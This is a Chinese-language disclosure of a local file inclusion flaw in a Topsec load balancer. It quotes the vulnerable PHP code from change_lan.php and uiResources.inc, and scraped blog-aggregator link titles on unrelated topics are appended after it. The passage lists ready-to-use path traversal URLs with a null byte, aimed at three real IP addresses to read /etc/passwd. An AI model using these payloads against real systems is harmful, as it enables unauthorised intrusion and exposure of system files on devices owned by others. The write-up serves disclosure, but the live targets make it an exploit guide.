change lan.php lanid,天融信负载均衡本地文件包含漏洞
本地文件包含:
漏洞说明:
出入的地方:在change_lan.php传入会话变量。
error_reporting(E_ALL ^ E_WARNING ^ E_NOTICE);
include_once dirname(__FILE__)."/acc/common/config/item/configItem.inc";
require_once dirname(__FILE__)."/acc/common/constant.inc";
include_once dirname(__FILE__)."/acc/common/config/uci/dao/appexSystemDao.inc";
$configItem = new ConfigItem();
/**
*
*
* @version $Id: change_lan.php,v 1.8.2.4 2011/10/11 04:20:42 jzhang Exp $
* @copyright 2008
*/
$lanID = 'En';
$refLink = $_SERVER['HTTP_REFERER'];
if(empty($refLink)){
$refLink = "/index.php";
}
$refLink = str_replace("?error=1", "", $refLink);
if(array_key_exists('LanID',$_REQUEST))
{
$lanID = $_REQUEST["LanID"];
$appexSystemDao = new AppexSystemDao();
$appexSystemDao->setAppexSystemConfigItemValue(LANGUAGE_ID_FIELD,$lanID);
$appexSystemDao->commit();
session_start();
$_SESSION['lanID'] = $lanID;
header('Location: ' . $refLink);
}else{
header('Location: ' . $refLink . '?LanID=' . $lanID);
}
?>
执行的地方在,uiResources.inc,包含语言包
/**
*
*
* @version $Id: uiResources.inc,v 1.4 2009/05/25 08:42:57 jzhang Exp $
* @copyright 2008
*/
include_once dirname(__FILE__)."/../config/item/configItem.inc";
require_once dirname(__FILE__)."/../constant.inc";
include_once dirname(__FILE__)."/../config/uci/dao/appexSystemDao.inc";
$appexSystemDao = new AppexSystemDao();
$lanID = $appexSystemDao->getAppexSystemConfigItemValue(LANGUAGE_ID_FIELD);
if(empty($lanID)){
$lanID = "En";
}
$uiResBasic = dirname(__FILE__) . "/../../common/uiResources_".$lanID.".inc";
$uiRes = dirname(__FILE__) . "/../../common/clsf/uiResources_clsf_".$lanID.".inc";
include_once $uiResBasic;
include_once $uiRes;
?>
网络案例:
http://61.148.24.182:8080/change_lan.php?LanID=../../../../../../../../../etc/passwd%00
http://61.54.222.43:8080/change_lan.php?LanID=../../../../../../../../../etc/passwd%00
http://222.143.9.1/change_lan.php?LanID=../../../../../../../../../etc/passwd%00
截图证明:
change lan.php lanid,天融信负载均衡本地文件包含漏洞相关推荐
- iis负载均衡与文件同步[网摘]
iis负载均衡与文件同步[网摘] IIS负载均衡.想实现iis6负载均衡.1.iis应该如何实现负载均衡 2.实现后对于用户Session 有何影响,如何解决 回答:建议, 1) NLB - 如何在 ...
- 强大的负载均衡+静态文件WEB服务器nginx实战
2019独角兽企业重金招聘Python工程师标准>>> 当前比较流行的负载均衡前端服务器主要有apache(with mod_proxy),nginx,lighttpd,squid, ...
- A10负载均衡ACOS固件(包含AX、Thunder系列)
A10负载均衡ACOS固件,包含AX.Thunder系列: 网盘地址: http://pan.baidu.com/s/1eSw1apG 转载于:https://blog.51cto.com/jiang ...
- change lan.php lanid,HG522-C(HG522BBA VER.A,AM29LV320MT)刷OPENWRT,LAN1改WAN成功
最近学习OPENWRT,潜水恩山和无线等论坛N久,论坛和博客的各种教程也看了无数,可华为HG522-C刷OPENWRT的资料还是不太全面,虽然HG522BBA VER.A都说可刷,但不少帖子和教程对闪 ...
- zabbix模板-天融信防火墙
天融信防火墙,的zabbix模板,自己摸索创建的,网络上很少有zabbix监控设备的详细介绍.导入模板修改信息即可使用.监控了流量,运行时间,会话数,内存,CPU利用率,VPN隧道状态等常用信息.因V ...
- 【万字长文】吃透负载均衡
首先告诉大家一件事,在十一国庆期间,引擎的机器又又...又扛不住了流量. 经过监控分析,发现某个服务的一个实例所在的虚拟机扛不住了,所以采取临时措施流量控制之后,问题解决了,但还是造成了不小的损失. ...
- Spring RSocket:基于服务注册发现的 RSocket 负载均衡
作者 | 雷卷 来源|阿里巴巴云原生公众号 RSocket 分布式通讯协议是 Spring Reactive 的核心内容,从 Spring Framework 5.2 开始,RSocket 已经是 S ...
- 企业级负载均衡如何实现
转载自 企业级负载均衡如何实现 负载均衡简介 首先,我们来了解一下什么是负载均衡: 在一个大型网站中,在线用户有时可能有几千个甚至上万个之多.如果一个用户的请求需要服务使用0.02秒来处理,那么该服 ...
- Kali学习笔记15:防火墙识别、负载均衡识别、WAF识别
防火墙简单的识别方式: 如图: 可以简单明了看出:发送SYN不回应,发送ACK回RST可以说明开启过滤等等 基于这个原理,我们可以写一个脚本来对防火墙来探测和识别: #!/usr/bin/python ...
最新文章
- IntelliLock托管代码保护和许可授权管理系统软件详细介绍及下载
- Navicat for MySQL连接MYSQL出错,错误代码1045的解决方法
- 基于RBF简单的matlab手写识别
- twilio_15分钟内使用Twilio和Stormpath在Spring Boot中进行身份管理
- 使用Selenium和HTML中的动态ID进行Java测试
- 【金融申请评分卡】数据准备 - 造衍生变量
- 宁夏职称评计算机,宁夏专业技术人员服务平台职称评审系统:http://124.224.239.164(2)...
- 云知声今年要量产三款芯片,还公布了多模态AI芯片规划
- Zookeeper与Kafka集群搭建
- GitHub GraphQL API已正式可用
- 整理 Mac 安装 oracle
- 作业2-Python基础练习
- 使用FileTypesMan修复office关联图标
- Android虚拟按键的适配
- css颜色和长度简写
- python记录程序运行时间的三种方法
- 蒙特卡洛方法到底有什么用(转)
- LA 4394 String painter 区间DP -
- 洛谷 P3354 [IOI2005]Riv 河流【树形dp】
- c语言中cap是什么缩写,ACID中C与CAP定理中C的区别
热门文章
- 邮政平邮批量查询未签收物流的方法
- JavaScript 中 的等号(==)/不等号(!=) 和全等号(===)/非全等号(!==)
- AutoCAD Electrical Essential Training AutoCAD Electrical Essential Training Lynda课程中文字幕
- 她 | papi酱的中场“战事”
- python爬虫-多线程小说批量下载
- python小欢喜(一)写一个python程序如此简单
- oracle select into 导致报错
- Linux 安装redis5.0.7 设置密码,开启远程访问
- 疫情只是催化剂 2020注定开启协同办公新纪元
- 仿站小工具下载目标网站